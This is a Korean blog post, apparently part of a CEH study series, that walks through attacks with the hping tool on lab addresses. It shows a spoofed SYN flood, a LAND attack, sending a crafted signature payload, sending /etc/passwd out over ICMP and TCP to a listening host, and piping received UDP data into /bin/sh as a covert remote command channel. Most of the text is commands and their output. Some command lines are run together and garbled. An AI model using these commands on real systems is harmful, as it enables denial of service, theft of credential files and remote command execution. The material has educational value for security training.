SYN ATTACK
SYN 공격은 말 그대로 SYN패킷을 타켓 네트워크로 계속 보내면서 상대방의 리소스를 소모하게 하는 방법이다. SYN 패킷을 받은 타겟은 SYN/ACK를 공격자에게 전송하면서 ACK 패킷을 기다리게 된다. 하지만 공격자는 ACK를 보내지 않음으로 해서 타켓 호스트가 half-open상태로 놔두는 방식이다. 이를 응답을 안해준다고 해서 Stealth 공격이라고도 한다. -a는 공격자의 IP를 임의의 IP로 바꾸어서 공격해주는 옵션이다.
[root@localhost root]# hping -I eth0 -a 192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
참고로 타겟호스트로부터 응답을 받을 수 없는데 이는 공격자의 IP를 바꾸었기 때문에 SYN/ACK 패킷이 바뀐 IP로 전송되었기 때문이다.
타겟 호스트를 보면,
C:\WINNT>netstat -n -p tcp
Active Connections
Proto Local Address Foreign Address State
TCP 192.168.10.33:80 192.168.10.99:2555 SYN_RECEIVED
TCP 192.168.10.33:80 192.168.10.99:2556 SYN_RECEIVED
TCP 192.168.10.33:80 192.168.10.99:2557 SYN_RECEIVED
TCP 192.168.10.33:80 192.168.10.99:2558 SYN_RECEIVED
TCP 192.168.10.33:80 192.168.10.99:2559 SYN_RECEIVED
TCP 192.168.10.33:80 192.168.10.99:2560 SYN_RECEIVED
TCP 192.168.10.33:80 192.168.10.99:2561 SYN_RECEIVED
TCP 192.168.10.33:80 192.168.10.99:2562 SYN_RECEIVED
위의 netstat에 대한 결과를 보면 SYN이 계속 들어오는 것을 볼 수 있다. netstat은 현재 열려있는 혹은 통신준비중인 포트에 대한 정보를 나타낸다.
LAND 공격
LAND공격은 타겟호스트의 IP를 소스아이피로 같이 사용하면서 DOS 공격을 유발하는 방식이다.
[root@localhost root]# hping -S -a 10.10.10.10 -p 21 10.10.10.10
HPING 10.10.10.1 (eth0 10.10.10.1): S set, 40 headers + 0 data bytes
Signature를 이용한 공격
Signature.sig파일을 생성하여 buffer overflow와 같은 공격을 수행할 수 있다.
[root@localhost rules]# hping -2 -p 7 192.168.10.33 -d 50 -E /root/signature.sig
HPING 192.168.10.33 (eth0 192.168.10.33): udp mode set, 28 headers + 50 data bytes
len=78 ip=192.168.10.33 seq=0 ttl=128 id=24842 rtt=4.9 ms
len=78 ip=192.168.10.33 seq=1 ttl=128 id=24844 rtt=1.6 ms
len=78 ip=192.168.10.33 seq=2 ttl=128 id=24846 rtt=1.0 ms
--- 192.168.10.33 hping statistic ---
3 packets tramitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 1.0/2.5/4.9 ms
[root@localhost rules]#
-2는 UDP모드로, -d는 데이타 길이를 -E는 Signature 옵션이다.
위는 Tcpdump를 통해 얻어진 값으로 타겟 호스트에 저장된 패킷값이다. Tcpdump는 Windows 버전의 Wireshark와 같은 프로그램으로 패킷캡춰툴로써 Wireshark도 Tcpdump엔진을 사용한다.
ICMP, UDP, TCP를 이용한 데이타의 전송
타겟호스트에 hping을 실행할수 있다는 전제하에 ICMP를 이용한 데이타 전송이다.
[root@localhost root]# hping 192.168.10.66 --listen signature --safe --icmp
hping2 listen mode
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
....
[root@knoppix root]# hping 192.168.10.44 --icmp .d 100 --sign signature --file /etc/passwd
TCP를 통한 전송은,
[root@localhost root]# hping 192.168.10.66 --listen signature --safe-p 22hping2 listen moderoot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmai--- 192.168.10.66 hping statistic ---4 packets tramitted, 0 packets received, 100% packet lossround-trip min/avg/max = 0.0/0.0/0.0 ms[root@localhost root]#
공격호스트쪽에서는
[root@knoppix root]hping -p 22 d 100 --sign signature --file/etc/passwd
이런식으로 해서 트로이안공격을 시도할 수도 있다.
[root@localhost root]# hping 192.168.10.66 --listen signature --safe --udp -p 53 |/bin/shhping2
listen modeamsn_received libreadme.txtanaconda-ks.cfg libfwbuilder-0.10.13-1.rh7.i386.rpmreport.htmlavi license.txtsbinCPsrsc-50-02.i386.rpm linux-wlan-ng-0.1.16-pre5scripts...
[root@knoppix root]# echo ls >test.cmd[root@knoppix root]# hping 192.168.10.44 -p 53 -d 100 --udp --signsiganature --file ./test.cmd
knoppix는 공격자이고 localhost는 타겟호스트로 보고 위와 같이 타겟호스트에 권한만 주어진다면 hping을 통해 다양한 공격을 행할 수 있다.
hping은 여기까지 다룰 예정이다. 아무래도 nmap이 스캔하는데는 제일 사용하기 편리한 툴이기에 zenmap을 좀 다뤄보도록 하겠다. 그런데 내가 다 쓰고 읽어봐도 많은 부분이 설명이 안되어진걸 알겠지만 이걸 또 일일이 설명하기가 글로써는 무리가 좀 있는듯 하다. 조만간 동영상강좌를 만들어서 올려보도록 하겠다.
'보안vs해킹' 카테고리의 다른 글
| CEH Chap 5. OpenVAS 1/2 (0) | 2011.11.11 |
|---|---|
| CEH Chap 4. Zenmap (0) | 2011.11.10 |
| CEH Chap 2. hping - Idle scanning, ... (0) | 2011.11.08 |
| CEH Chap 1. hping? (0) | 2011.11.07 |
| BackTrack 5 백트랙 5 설치하기 (2) | 2011.11.06 |
